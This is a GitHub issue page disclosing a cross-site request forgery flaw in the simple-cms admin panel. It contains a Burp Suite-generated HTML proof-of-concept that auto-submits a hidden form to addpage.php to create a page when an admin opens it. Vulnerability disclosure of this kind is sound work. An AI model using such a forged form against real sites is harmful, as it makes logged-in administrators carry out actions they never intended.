simple-cms icon indicating copy to clipboard operation
simple-cms copied to clipboard

Published 20 hours ago verified publisher icon dcblogdev

simple-cms has Cross-site request forgery

Open SunJ3t opened this issue 7 years ago • 0 comments

http://192.168.2.129/simple/admin/

I can add page when admin click the html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.129/simple/admin/addpage.php" method="POST">
      <input type="hidden" name="pageTitle" value="csrftest" />
      <input type="hidden" name="pageCont" value="csrftest" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1

SunJ3t avatar Aug 08 '18 03:08 SunJ3t